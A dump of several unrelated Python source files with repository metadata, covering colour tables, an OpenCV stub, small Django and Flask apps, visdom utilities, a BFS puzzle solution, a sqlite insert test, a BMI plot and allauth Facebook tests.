    'crimson': (220, 20, 60, 1.0),
    'cyan': (0, 255, 255, 1.0),
    'darkblue': (0, 0, 139, 1.0),
    'darkcyan': (0, 139, 139, 1.0),
    'darkgoldenrod': (184, 134, 11, 1.0),
    'darkgray': (169, 169, 169, 1.0),
    'darkgreen': (0, 100, 0, 1.0),
    'darkgrey': (169, 169, 169, 1.0),
    'darkkhaki': (189, 183, 107, 1.0),
    'darkmagenta': (139, 0, 139, 1.0),
    'darkolivegreen': (85, 107, 47, 1.0),
    'darkorange': (255, 140, 0, 1.0),
    'darkorchid': (153, 50, 204, 1.0),
    'darkred': (139, 0, 0, 1.0),
    'darksalmon': (233, 150, 122, 1.0),
    'darkseagreen': (143, 188, 143, 1.0),
    'darkslateblue': (72, 61, 139, 1.0),
    'darkslategray': (47, 79, 79, 1.0),
    'darkslategrey': (47, 79, 79, 1.0),
    'darkturquoise': (0, 206, 209, 1.0),
    'darkviolet': (148, 0, 211, 1.0),
    'deeppink': (255, 20, 147, 1.0),
    'deepskyblue': (0, 191, 255, 1.0),
    'dimgray': (105, 105, 105, 1.0),
    'dimgrey': (105, 105, 105, 1.0),
    'dodgerblue': (30, 144, 255, 1.0),
    'firebrick': (178, 34, 34, 1.0),
    'floralwhite': (255, 250, 240, 1.0),
    'forestgreen': (34, 139, 34, 1.0),
    'fuchsia': (255, 0, 255, 1.0),
    'gainsboro': (220, 220, 220, 1.0),
    'ghostwhite': (248, 248, 255, 1.0),
    'gold': (255, 215, 0, 1.0),
    'goldenrod': (218, 165, 32, 1.0),
    'gray': (128, 128, 128, 1.0),
    'green': (0, 128, 0, 1.0),
    'greenyellow': (173, 255, 47, 1.0),
    'grey': (128, 128, 128, 1.0),
    'honeydew': (240, 255, 240, 1.0),
    'hotpink': (255, 105, 180, 1.0),
    'indianred': (205, 92, 92, 1.0),
    'indigo': (75, 0, 130, 1.0),
    'ivory': (255, 255, 240, 1.0),
    'khaki': (240, 230, 140, 1.0),
    'lavender': (230, 230, 250, 1.0),
    'lavenderblush': (255, 240, 245, 1.0),
    'lawngreen': (124, 252, 0, 1.0),
    'lemonchiffon': (255, 250, 205, 1.0),
    'lightblue': (173, 216, 230, 1.0),
    'lightcoral': (240, 128, 128, 1.0),
    'lightcyan': (224, 255, 255, 1.0),
    'lightgoldenrodyellow': (250, 250, 210, 1.0),
    'lightgray': (211, 211, 211, 1.0),
    'lightgreen': (144, 238, 144, 1.0),
    'lightgrey': (211, 211, 211, 1.0),
    'lightpink': (255, 182, 193, 1.0),
    'lightsalmon': (255, 160, 122, 1.0),
    'lightseagreen': (32, 178, 170, 1.0),
    'lightskyblue': (135, 206, 250, 1.0),
    'lightslategray': (119, 136, 153, 1.0),
    'lightslategrey': (119, 136, 153, 1.0),
    'lightsteelblue': (176, 196, 222, 1.0),
    'lightyellow': (255, 255, 224, 1.0),
    'lime': (0, 255, 0, 1.0),
    'limegreen': (50, 205, 50, 1.0),
    'linen': (250, 240, 230, 1.0),
    'magenta': (255, 0, 255, 1.0),
    'maroon': (128, 0, 0, 1.0),
    'mediumaquamarine': (102, 205, 170, 1.0),
    'mediumblue': (0, 0, 205, 1.0),
    'mediumorchid': (186, 85, 211, 1.0),
    'mediumpurple': (147, 112, 219, 1.0),
    'mediumseagreen': (60, 179, 113, 1.0),
    'mediumslateblue': (123, 104, 238, 1.0),
    'mediumspringgreen': (0, 250, 154, 1.0),
    'mediumturquoise': (72, 209, 204, 1.0),
    'mediumvioletred': (199, 21, 133, 1.0),
    'midnightblue': (25, 25, 112, 1.0),
    'mintcream': (245, 255, 250, 1.0),
    'mistyrose': (255, 228, 225, 1.0),
    'moccasin': (255, 228, 181, 1.0),
    'navajowhite': (255, 222, 173, 1.0),
    'navy': (0, 0, 128, 1.0),
    'oldlace': (253, 245, 230, 1.0),
    'olive': (128, 128, 0, 1.0),
    'olivedrab': (107, 142, 35, 1.0),
    'orange': (255, 165, 0, 1.0),
    'orangered': (255, 69, 0, 1.0),
    'orchid': (218, 112, 214, 1.0),
    'palegoldenrod': (238, 232, 170, 1.0),
    'palegreen': (152, 251, 152, 1.0),
    'paleturquoise': (175, 238, 238, 1.0),
    'palevioletred': (219, 112, 147, 1.0),
    'papayawhip': (255, 239, 213, 1.0),
    'peachpuff': (255, 218, 185, 1.0),
    'peru': (205, 133, 63, 1.0),
    'pink': (255, 192, 203, 1.0),
    'plum': (221, 160, 221, 1.0),
    'powderblue': (176, 224, 230, 1.0),
    'purple': (128, 0, 128, 1.0),
    'red': (255, 0, 0, 1.0),
    'rosybrown': (188, 143, 143, 1.0),
    'royalblue': (65, 105, 225, 1.0),
    'saddlebrown': (139, 69, 19, 1.0),
    'salmon': (250, 128, 114, 1.0),
    'sandybrown': (244, 164, 96, 1.0),
    'seagreen': (46, 139, 87, 1.0),
    'seashell': (255, 245, 238, 1.0),
    'sienna': (160, 82, 45, 1.0),
    'silver': (192, 192, 192, 1.0),
    'skyblue': (135, 206, 235, 1.0),
    'slateblue': (106, 90, 205, 1.0),
    'slategray': (112, 128, 144, 1.0),
    'slategrey': (112, 128, 144, 1.0),
    'snow': (255, 250, 250, 1.0),
    'springgreen': (0, 255, 127, 1.0),
    'steelblue': (70, 130, 180, 1.0),
    'tan': (210, 180, 140, 1.0),
    'teal': (0, 128, 128, 1.0),
    'thistle': (216, 191, 216, 1.0),
    'tomato': (255, 99, 71, 1.0),
    'turquoise': (64, 224, 208, 1.0),
    'violet': (238, 130, 238, 1.0),
    'wheat': (245, 222, 179, 1.0),
    'white': (255, 255, 255, 1.0),
    'whitesmoke': (245, 245, 245, 1.0),
    'yellow': (255, 255, 0, 1.0),
    'yellowgreen': (154, 205, 50, 1.0),
}
|
[
"iabouelftouh@trudoc24x7.com"
] |
iabouelftouh@trudoc24x7.com
|
30a67ecaa65f58462ea307f9e7814f41c0df1c1a
|
2aace9bb170363e181eb7520e93def25f38dbe5c
|
/build/idea-sandbox/system/python_stubs/cache/2e033ce6e3a2cdde5174895cadb3b406b2a013729dd641fee2cebd9f7ed97879/cv2/cv2/StereoMatcher.py
|
7ab88dbc440f1ef092cd9bd0c28536beb666920f
|
[] |
no_license
|
qkpqkp/PlagCheck
|
13cb66fd2b2caa2451690bb72a2634bdaa07f1e6
|
d229904674a5a6e46738179c7494488ca930045e
|
refs/heads/master
| 2023-05-28T15:06:08.723143
| 2021-06-09T05:36:34
| 2021-06-09T05:36:34
| 375,235,940
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,845
|
py
|
# encoding: utf-8
# module cv2.cv2
# from C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
# by generator 1.147
""" Python wrapper for OpenCV. """
# imports
import cv2.cv2 as # C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
import cv2.Error as Error # <module 'cv2.Error'>
import cv2.aruco as aruco # <module 'cv2.aruco'>
import cv2.bgsegm as bgsegm # <module 'cv2.bgsegm'>
import cv2.bioinspired as bioinspired # <module 'cv2.bioinspired'>
import cv2.cuda as cuda # <module 'cv2.cuda'>
import cv2.datasets as datasets # <module 'cv2.datasets'>
import cv2.detail as detail # <module 'cv2.detail'>
import cv2.dnn as dnn # <module 'cv2.dnn'>
import cv2.face as face # <module 'cv2.face'>
import cv2.fisheye as fisheye # <module 'cv2.fisheye'>
import cv2.flann as flann # <module 'cv2.flann'>
import cv2.ft as ft # <module 'cv2.ft'>
import cv2.hfs as hfs # <module 'cv2.hfs'>
import cv2.img_hash as img_hash # <module 'cv2.img_hash'>
import cv2.instr as instr # <module 'cv2.instr'>
import cv2.ipp as ipp # <module 'cv2.ipp'>
import cv2.kinfu as kinfu # <module 'cv2.kinfu'>
import cv2.line_descriptor as line_descriptor # <module 'cv2.line_descriptor'>
import cv2.linemod as linemod # <module 'cv2.linemod'>
import cv2.ml as ml # <module 'cv2.ml'>
import cv2.motempl as motempl # <module 'cv2.motempl'>
import cv2.multicalib as multicalib # <module 'cv2.multicalib'>
import cv2.ocl as ocl # <module 'cv2.ocl'>
import cv2.ogl as ogl # <module 'cv2.ogl'>
import cv2.omnidir as omnidir # <module 'cv2.omnidir'>
import cv2.optflow as optflow # <module 'cv2.optflow'>
import cv2.plot as plot # <module 'cv2.plot'>
import cv2.ppf_match_3d as ppf_match_3d # <module 'cv2.ppf_match_3d'>
import cv2.quality as quality # <module 'cv2.quality'>
import cv2.reg as reg # <module 'cv2.reg'>
import cv2.rgbd as rgbd # <module 'cv2.rgbd'>
import cv2.saliency as saliency # <module 'cv2.saliency'>
import cv2.samples as samples # <module 'cv2.samples'>
import cv2.structured_light as structured_light # <module 'cv2.structured_light'>
import cv2.text as text # <module 'cv2.text'>
import cv2.utils as utils # <module 'cv2.utils'>
import cv2.videoio_registry as videoio_registry # <module 'cv2.videoio_registry'>
import cv2.videostab as videostab # <module 'cv2.videostab'>
import cv2.xfeatures2d as xfeatures2d # <module 'cv2.xfeatures2d'>
import cv2.ximgproc as ximgproc # <module 'cv2.ximgproc'>
import cv2.xphoto as xphoto # <module 'cv2.xphoto'>
import cv2 as __cv2
class StereoMatcher(__cv2.Algorithm):
    """Auto-generated IDE stub for OpenCV's StereoMatcher base class.

    The real implementation lives in the compiled cv2 extension; every method
    body below is a placeholder (``pass``) kept only so IDEs can offer
    signatures and the docstrings restored from the C++ documentation.
    """
    def compute(self, left, right, disparity=None): # real signature unknown; restored from __doc__
        """
        compute(left, right[, disparity]) -> disparity
        .   @brief Computes disparity map for the specified stereo pair
        .
        .   @param left Left 8-bit single-channel image.
        .   @param right Right image of the same size and the same type as the left one.
        .   @param disparity Output disparity map. It has the same size as the input images. Some algorithms,
        .   like StereoBM or StereoSGBM compute 16-bit fixed-point disparity map (where each disparity value
        .   has 4 fractional bits), whereas other algorithms output 32-bit floating-point disparity map.
        """
        pass

    def getBlockSize(self): # real signature unknown; restored from __doc__
        """
        getBlockSize() -> retval
        .
        """
        pass

    def getDisp12MaxDiff(self): # real signature unknown; restored from __doc__
        """
        getDisp12MaxDiff() -> retval
        .
        """
        pass

    def getMinDisparity(self): # real signature unknown; restored from __doc__
        """
        getMinDisparity() -> retval
        .
        """
        pass

    def getNumDisparities(self): # real signature unknown; restored from __doc__
        """
        getNumDisparities() -> retval
        .
        """
        pass

    def getSpeckleRange(self): # real signature unknown; restored from __doc__
        """
        getSpeckleRange() -> retval
        .
        """
        pass

    def getSpeckleWindowSize(self): # real signature unknown; restored from __doc__
        """
        getSpeckleWindowSize() -> retval
        .
        """
        pass

    def setBlockSize(self, blockSize): # real signature unknown; restored from __doc__
        """
        setBlockSize(blockSize) -> None
        .
        """
        pass

    def setDisp12MaxDiff(self, disp12MaxDiff): # real signature unknown; restored from __doc__
        """
        setDisp12MaxDiff(disp12MaxDiff) -> None
        .
        """
        pass

    def setMinDisparity(self, minDisparity): # real signature unknown; restored from __doc__
        """
        setMinDisparity(minDisparity) -> None
        .
        """
        pass

    def setNumDisparities(self, numDisparities): # real signature unknown; restored from __doc__
        """
        setNumDisparities(numDisparities) -> None
        .
        """
        pass

    def setSpeckleRange(self, speckleRange): # real signature unknown; restored from __doc__
        """
        setSpeckleRange(speckleRange) -> None
        .
        """
        pass

    def setSpeckleWindowSize(self, speckleWindowSize): # real signature unknown; restored from __doc__
        """
        setSpeckleWindowSize(speckleWindowSize) -> None
        .
        """
        pass

    def __init__(self, *args, **kwargs): # real signature unknown
        pass

    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object.  See help(type) for accurate signature. """
        pass

    def __repr__(self, *args, **kwargs): # real signature unknown
        """ Return repr(self). """
        pass
|
[
"qinkunpeng2015@163.com"
] |
qinkunpeng2015@163.com
|
bd60096a6677e31ccf2f53c0600f73f693a5370f
|
12c43be8658110886f71bd792653c7f2c7d9b016
|
/project/app/apps.py
|
d85135acda52ac4478cffadffcfcb0eeb6b61525
|
[] |
no_license
|
umum253/django-generic-project
|
8caf11e19d31766be0e651d979341591020f763c
|
60042cf8fea5a0b8ca3defe18fb96e0b5044e6fe
|
refs/heads/main
| 2023-06-29T23:49:27.318825
| 2021-08-06T10:53:03
| 2021-08-06T10:53:03
| 393,347,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.apps import AppConfig
class SampleAppConfig(AppConfig):
name = 'app'
verbose_name = 'アプリ'
|
[
"fkwpostpost@gmail.com"
] |
fkwpostpost@gmail.com
|
93b50fe7cb62642f0337d0ffed643cb754d339e0
|
db1d9b55ac8e15182336d8fdbfcd5668d908fba6
|
/4_flask_restful_hello_world.py
|
db6e1ce37da625792a32e450fad8340a9a7356f2
|
[] |
no_license
|
sangameshBB/apis_with_flask
|
573694ac00bc9ddf443df977a119d678edc6e67f
|
81c088a048f1445b05ef151a74283778db1ad13d
|
refs/heads/master
| 2022-09-05T23:01:35.623221
| 2020-05-29T14:39:59
| 2020-05-29T14:39:59
| 267,879,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
    """Single-endpoint flask-restful resource returning a fixed greeting."""

    def get(self):
        """Handle GET by returning the canonical hello-world payload."""
        payload = {'hello': 'world'}
        return payload
api.add_resource(HelloWorld, '/')
if __name__ == '__main__':
app.run(debug=True)
|
[
"noreply@github.com"
] |
noreply@github.com
|
22ace41fc6d9774b05648c5ecdfc968f4e0cff95
|
c3fd71a80fadbf2b567911b2fd3aa2e16f6e5a39
|
/jpl/cli/config.py
|
416b87bb9928be54d40bddbd87ae709928795d04
|
[
"MIT"
] |
permissive
|
thejig/jpl
|
ae88037e82d414eb096282421d9b5e5231072ae7
|
be58184e29588f01e494f218354791516d481f3b
|
refs/heads/master
| 2021-01-05T06:23:48.639782
| 2020-06-12T02:18:17
| 2020-06-12T02:18:17
| 240,913,777
| 0
| 1
|
MIT
| 2020-02-28T01:08:52
| 2020-02-16T15:19:46
|
Python
|
UTF-8
|
Python
| false
| false
| 170
|
py
|
"""Configuration for CLI."""
################
# CLICK COLORS #
################
MARK_TO_COLOR = {
"PASSED": "green",
"WARNING": "yellow",
"FAILED": "red"
}
|
[
"leonkozlowski@gmail.com"
] |
leonkozlowski@gmail.com
|
97f69ec49c421509df9b9ef2b9c6785bdb0dafc5
|
9ee327caec1165ff7c70ddb2d792388e5b6be3b5
|
/src/utils.py
|
3f6760f2bbaa8f8ed1b93a1ca48119143e7a1ec2
|
[] |
no_license
|
nicktao9/AgriculturalDiseaseClassification
|
62a0f5c1b8301c431e6c4435abcb4dda0897210b
|
f505aad04b7d421bbb2d2c91f75e02813a2f8dc7
|
refs/heads/master
| 2020-04-06T18:00:42.357728
| 2018-11-15T09:28:42
| 2018-11-15T09:28:42
| 157,681,631
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,289
|
py
|
import sys, os, time
import visdom
import time,glob
import numpy as np
import cv2,json,shutil
import logging
from tqdm import tqdm
""" Create a new dir """
def create_folder(fd):
    """Create directory *fd* (including parents) if it does not exist.

    Fix: uses ``exist_ok=True`` instead of the original
    ``exists()``-then-``makedirs()`` pair, which could raise if another
    process created the directory between the check and the call.
    """
    os.makedirs(fd, exist_ok=True)
""" Visuallizer Module """
class Visualizer(object):
    """
    Thin wrapper around the basic visdom operations; the native visdom API
    remains reachable through ``self.vis.function``.
    """

    def __init__(self, env='default', **kwargs):
        self.vis = visdom.Visdom(env=env, **kwargs)
        # Per-series point counter, used as the x coordinate of the next
        # point: storing ('loss', 23) means the 23rd point of 'loss'.
        self.index = {}
        self.log_text = ''

    def reinit(self, env='default', **kwargs):
        """
        Reconfigure the underlying visdom connection.
        """
        self.vis = visdom.Visdom(env=env, **kwargs)
        return self

    def plot_many(self, d):
        """
        Plot several series at once.
        @params d: dict (name, value) i.e. ('loss', 0.11)
        """
        for k, v in d.items():
            self.plot(k, v)

    def img_many(self, d):
        # Same as plot_many but for images.
        for k, v in d.items():
            self.img(k, v)

    def plot(self, name, y, **kwargs):
        """
        Append one point to the named line plot, e.g. self.plot('loss', 1.00).
        """
        # x coordinate comes from the per-series counter.
        x = self.index.get(name, 0)
        self.vis.line(Y=np.array([y]), X=np.array([x]),
                      win=name,
                      opts=dict(title=name),
                      update=None if x == 0 else 'append',
                      **kwargs
                      )
        self.index[name] = x + 1

    def img(self, name, img_, **kwargs):
        """
        self.img('input_img',t.Tensor(64,64))
        self.img('input_imgs',t.Tensor(3,64,64))
        self.img('input_imgs',t.Tensor(100,1,64,64))
        self.img('input_imgs',t.Tensor(100,3,64,64),nrows=10)
        !!!don‘t ~~self.img('input_imgs',t.Tensor(100,64,64),nrows=10)~~!!!
        """
        self.vis.images(img_.cpu().numpy(),
                        win=name,
                        opts=dict(title=name),
                        **kwargs
                        )

    def log(self, info, win='log_text'):
        """
        Append a timestamped entry to the text window, e.g.
        self.log({'loss':1,'lr':0.0001})
        """
        self.log_text += ('[{time}] {info} <br>'.format(
            time=time.strftime('%m%d_%H%M%S'),
            info=info))
        self.vis.text(self.log_text, win)

    def __getattr__(self, name):
        # Delegate any unknown attribute to the raw visdom client.
        return getattr(self.vis, name)
""" log module """
class log(object):
    """
    Simple file logger.

    Usage:
        log = log()
        log.printf("This is a good start {}".format(1))
    """
    def __init__(self,
                 level = logging.DEBUG,
                 format1 = '%(asctime)s %(filename)s : %(levelname)s %(message)s',
                 datefmt = '%Y-%m-%d %A %H:%M:%S',
                 filename = os.path.join("../Result/","log.txt"),
                 filemode = 'w'):
        logging.basicConfig(
            level= level,        # minimum level written to the log file
            format= format1,     # log record format
            datefmt= datefmt,    # timestamp format
            filename= filename,  # log file path
            filemode=filemode)   # write mode: 'w' truncate or 'a' append

    def printf(self,str):
        # NOTE(review): the parameter name shadows the builtin str.
        logging.info(str)
# NOTE(review): function name has a typo ("classfication") but is kept as-is
# because it is called by name below.
def img2classfication(input_json_path,input_file_path,outputs_folders_path):
    """put the picture of json file in the folders of corresponding label

    Args:
        input_json_path :origion json path
        input_file_path :all images folder
        outputs_folders_path:outputs path of file
    Returns:
        different label folders in outputs_folders_path
    """
    # Annotations are a list of {"image_id": ..., "disease_class": ...} dicts.
    with open(input_json_path,'r') as f:
        data_dict = json.load(f)

    with tqdm(total = len(data_dict),unit= 'pic') as pbar:
        for data in data_dict:
            data_name = data['image_id']
            data_label = data['disease_class']
            # One output sub-folder per label; created lazily per image.
            create_folder(outputs_folders_path +"/"+str(data_label))
            shutil.copy(input_file_path + "/" + data_name,outputs_folders_path + "/" + str(data_label) +"/" + data_name)
            pbar.update(1)
if __name__ == "__main__":
img2classfication("../../datasets/ai_challenge/val_set/val_annotations.json","../../datasets/ai_challenge/val_set/images/","../../datasets/ai_challenge/new_val_set/")
|
[
"taolianjie007@163.com"
] |
taolianjie007@163.com
|
60c9db8974c4fcdaf3f0fc22cf0b0a1ad6083ca1
|
5095a2cbc3fea5b63b6f3cabf4ae1bd930cdb479
|
/영동/16_숨바꼭질.py
|
68332c98c92b749a3fb174e52d26d5d881b07e15
|
[] |
no_license
|
syeeuns/week03
|
a198150d94caf772d6421b4adf6d8e28793853db
|
cf40b994fa285800854bac07b7ef86ad5dbdf35a
|
refs/heads/master
| 2023-02-06T13:13:11.012967
| 2020-12-31T04:14:10
| 2020-12-31T04:14:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 438
|
py
|
from collections import deque

# Hide-and-seek: shortest move count from N to K on the line [0, 100000],
# where each step goes to v-1, v+1 or v*2; also prints the path taken.
N,K = map(int, input().split())
Max=10**5+1
queue=deque([N])
# D[v][0] = BFS distance from N to v (-1 = unvisited); D[v][1] = predecessor.
D=[[-1]*2 for _ in range(Max)]
D[N][0]=0
T=[K]
z=K
# Standard BFS over the three possible moves.
while queue:
    v = queue.popleft()
    for newv in [v-1,v+1,v*2]:
        if 0<= newv < Max and D[newv][0]==-1:
            queue.append(newv)
            D[newv][0]=D[v][0]+1
            D[newv][1]=v
# Walk predecessor links back from K until reaching N (whose predecessor is -1).
while D[z][1]!=-1:
    T.append(D[z][1])
    z=D[z][1]
print(D[K][0])
# Path was collected K->N, so print it reversed (N ... K).
print(*reversed(T))
|
[
"zeroistfilm@naver.com"
] |
zeroistfilm@naver.com
|
43d4d44a3129344e934b24556ad12f994123e98b
|
114b2f71e553abc33f7774de00391488c74b1563
|
/websocket/tests.py
|
e6715e95a399eef9667284201cceb8de914e38ce
|
[] |
no_license
|
279zlj/Autotest_project
|
06589305df696b21e05a4f521a56c8170ec7b327
|
60576bfe56d9a4e76a590bfa3176e196d06dbeed
|
refs/heads/master
| 2022-12-14T03:42:49.933047
| 2018-08-28T03:15:53
| 2018-08-28T03:15:53
| 146,384,029
| 0
| 0
| null | 2022-12-08T02:23:10
| 2018-08-28T03:00:05
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,608
|
py
|
from django.test import TestCase
from client.c_client import Client
# Create your tests here.
import json
import sqlite3
import time
# def save_data(data_response):
# con = sqlite3.connect("D:\Autotestproject\Autotest_project\db.sqlite3")
# cur = con.cursor()
# cur.execute('insert into \
# auto_config_infos \
# (server_num,board,cpu,fc_card,gpu,hard_disk,hba,inspect_time,memory_bank,net_card,raid,status,vga) \
# values\
# ({},{},{},{},{},{},{},{},{},{},{},{},{})'.format(data_response["server_num"], data_response["board"],
# data_response["cpu"], data_response["fc_card"],
# data_response["gpu"], data_response["hard_disk"],
# data_response["hba"], data_response["inspect_time"],
# data_response["memory_bank"], data_response["net_card"], data_response["raid"],
# data_response["status"], data_response["vga"]))
# cur.execute('select * from auto_config_infos')
# print(cur.fetchall())
# con.commit()
# cur.close()
# d = {"raid": "", "fc_card": "", "status": 1, "checkstate": 0, "server_num": "23dfgtr", "ip_info": "127.0.0.1",
# "state": "success", "cpu": "CpuNum:1/CpuCore:4/CpuInfo:8Intel(R)Xeon(R)CPUE3-1230v3@3.30GHz",
# "inspect_time": 1534484708.3386865, "vga": "Graphics:LeadTekResearchInc.GK107[GeForceGT640][107d:2737]\r\n",
# "memory_bank": "MemInfo:*ASRock*Intel*Transcend/MemSize:4096MB/MemFreq:1600MT/s", "gpu": "", "hba": "",
# "hard_disk": "DiskInfo:WDCWD10EURX-73C/DiskNum:1/DiskVer:/01.01A01",
# "net_card": "NetBoardInfo:IntelCorporationEthernetConnection(2)I218-V",
# "board": "BoardName:Z97Pro3/BisoVersion:P1.20"}
# Sample inspection record (one server's hardware/health snapshot); keys
# match the columns of the auto_config_infos table. Consumed by the
# smoke-test call at the bottom of this file.
d = {"board": "BoardName:Z97Pro3/BisoVersion:P1.20", "hba": "",
     "net_card": "NetBoardInfo:IntelCorporationEthernetConnection(2)I218-V", "raid": "dash_raid",
     "vga": "Graphics:LeadTekResearchInc.GK107[GeForceGT640][107d:2737]\r\n", "ip_info": "127.0.0.1", "checkstate": 0,
     "memory_bank": "MemInfo:*ASRock*Intel*Transcend/MemSize:4096MB/MemFreq:1600MT/s", "state": "success",
     "hard_disk": "DiskInfo:WDCWD10EURX-73C/DiskNum:1/DiskVer:/01.01A01",
     "cpu": "CpuNum:1/CpuCore:4/CpuInfo:8Intel(R)Xeon(R)CPUE3-1230v3@3.30GHz", "gpu": "", "status": 1,
     "inspect_time": 1534486359.491127, "server_num": "23dfgtr", "fc_card": ""}
def save_data(data_response, db_path=r"D:\Autotestproject\Autotest_project\db.sqlite3"):
    """Insert one server inspection record into the auto_config_infos table.

    Args:
        data_response: dict holding one server's inspection snapshot; must
            contain the keys server_num, board, cpu, memory_bank, hard_disk,
            raid, vga, gpu, hba, net_card, fc_card, inspect_time, ip_info,
            checkstate, state and status.
        db_path: sqlite database file to write to; defaults to the project's
            local db.sqlite3 (raw string so backslashes stay literal). The
            parameter is new but defaulted, so existing callers are unchanged.

    Raises:
        KeyError: if a required key is missing from ``data_response``.
        sqlite3.Error: if the database is unreachable or the insert fails.
    """
    print(data_response)  # kept from the original as a debug trace
    params = [data_response["server_num"], data_response["board"], data_response["cpu"],
              data_response["memory_bank"], data_response["hard_disk"], data_response["raid"],
              data_response["vga"], data_response["gpu"], data_response["hba"],
              data_response["net_card"], data_response["fc_card"], data_response["inspect_time"],
              data_response["ip_info"], data_response["checkstate"], data_response["state"],
              data_response["status"]]
    con = sqlite3.connect(db_path)
    try:
        # '?' placeholders let sqlite3 do the quoting/escaping.
        con.execute('insert into auto_config_infos \
            (server_num,board,cpu,memory_bank,hard_disk,raid,vga,gpu,hba,net_card,fc_card,inspect_time,ip_info,checkstate,state,status) \
            values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', params)
        con.commit()
    finally:
        # The original leaked the connection (only the cursor was closed)
        # and ran a dead 'select *' whose result was discarded; both fixed.
        con.close()
# Smoke test: inserts the sample record whenever this module runs.
save_data(d)
|
[
"13414101644@163.com"
] |
13414101644@163.com
|
dab6144f837dc47e6411c03a43353b5968913916
|
8659a70b1a210bc0c8eceac7fb6152e42ebec8a2
|
/ch4/bmi/13-bmi-plot.py
|
19d7c858cfdb98a99c331833e33afb18885b6a0f
|
[] |
no_license
|
boossiman2/Python_web
|
49482575a54fc89b430891140bb48245a62af9e4
|
50b40cacff3613c3b413bd25de23ea8be3a70b7e
|
refs/heads/master
| 2018-11-08T03:30:13.606773
| 2018-08-28T12:33:49
| 2018-08-28T12:33:49
| 41,590,382
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 535
|
py
|
import matplotlib.pyplot as plt
import pandas as pd
# Read the CSV with pandas; column 2 (the "fat"/"normal"/"thin" label)
# becomes the index, so rows can be selected per label below.
tbl = pd.read_csv("bmi.csv", index_col=2)
# Start the figure: one axes on a 1x1 grid.
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
# Subplot helper: scatter every row carrying the given label in the
# given color (weight on x, height on y).
def scatter(lbl, color):
    b = tbl.loc[lbl]
    ax.scatter(b["weight"],b["height"], c=color, label=lbl)
scatter("fat", "red")
scatter("normal", "yellow")
scatter("thin", "purple")
ax.legend()
plt.savefig("bmi-test.png")
#plt.show()
|
[
"boossiman2@gmail.com"
] |
boossiman2@gmail.com
|
178b53756b1a7f1ccec51c10e04445888b4f6264
|
6f8e52d3c03d7a4c82a01dbaaca96719d8ad356f
|
/reader/migrations/0002_article_publish_date.py
|
41d8ce661d41cc22b036839a5db6864080b75c60
|
[] |
no_license
|
maest/chwlang
|
5df4c624e4c703192fdea8b03d1448a959d12368
|
72a81a0aba80af6362fe78dcd37ba972e150bf8f
|
refs/heads/master
| 2022-12-16T22:45:40.865007
| 2019-02-25T19:12:07
| 2019-02-25T19:12:07
| 199,169,668
| 0
| 0
| null | 2022-12-08T01:04:54
| 2019-07-27T13:40:39
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 379
|
py
|
# Generated by Django 2.0.2 on 2018-04-15 18:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration: add ``publish_date`` to Article.

    The new DateTimeField is nullable, so existing Article rows need no
    default/backfill when the migration is applied.
    """
    dependencies = [
        # Must run after the app's initial schema migration.
        ('reader', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='article',
            name='publish_date',
            field=models.DateTimeField(null=True),
        ),
    ]
|
[
"b.panait@gmail.com"
] |
b.panait@gmail.com
|
2358001a8b8e2de4a23fb90ca93ca55a3ac626f2
|
a2a9260526e0c2a20cb08bcad693d8bddb47d420
|
/lib/python2.7/site-packages/allauth/socialaccount/providers/facebook/tests.py
|
854d1c9745eeae47e94d54a3ac1351b41485b93a
|
[] |
no_license
|
shubh3794/Processing-Payment
|
42df51fb0e582d573fbfd030125f27b8c4464263
|
81c0223889a450f4d023d91eb2890e385afd198b
|
refs/heads/master
| 2021-01-10T03:50:38.727002
| 2015-11-25T20:56:41
| 2015-11-25T20:56:41
| 46,883,262
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,194
|
py
|
import json
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.test.client import RequestFactory
from allauth.socialaccount.tests import create_oauth2_tests
from allauth.tests import MockedResponse, patch
from allauth.socialaccount.models import SocialAccount
from allauth.socialaccount import providers
from allauth.socialaccount.providers import registry
from allauth.account import app_settings as account_settings
from allauth.account.models import EmailAddress
from allauth.utils import get_user_model
from .provider import FacebookProvider
@override_settings(
    SOCIALACCOUNT_AUTO_SIGNUP=True,
    ACCOUNT_SIGNUP_FORM_CLASS=None,
    LOGIN_REDIRECT_URL='/accounts/profile/',
    ACCOUNT_EMAIL_VERIFICATION=account_settings
    .EmailVerificationMethod.NONE,
    SOCIALACCOUNT_PROVIDERS={
        'facebook': {
            'AUTH_PARAMS': {},
            'VERIFIED_EMAIL': False}})
class FacebookTests(create_oauth2_tests(registry.by_id(FacebookProvider.id))):
    """OAuth2 login tests for the Facebook provider (vendored django-allauth).

    The base class is generated by ``create_oauth2_tests`` and supplies
    ``self.login(mocked_response)`` plus the OAuth2 test plumbing.
    """
    # Canned Graph API profile payload returned by the mocked endpoint.
    facebook_data = """
    {
        "id": "630595557",
        "name": "Raymond Penners",
        "first_name": "Raymond",
        "last_name": "Penners",
        "email": "raymond.penners@gmail.com",
        "link": "https://www.facebook.com/raymond.penners",
        "username": "raymond.penners",
        "birthday": "07/17/1973",
        "work": [
            {
                "employer": {
                    "id": "204953799537777",
                    "name": "IntenCT"
                }
            }
        ],
        "timezone": 1,
        "locale": "nl_NL",
        "verified": true,
        "updated_time": "2012-11-30T20:40:33+0000"
    }"""
    def get_mocked_response(self, data=None):
        # data: alternative JSON body; defaults to facebook_data above.
        if data is None:
            data = self.facebook_data
        return MockedResponse(200, data)
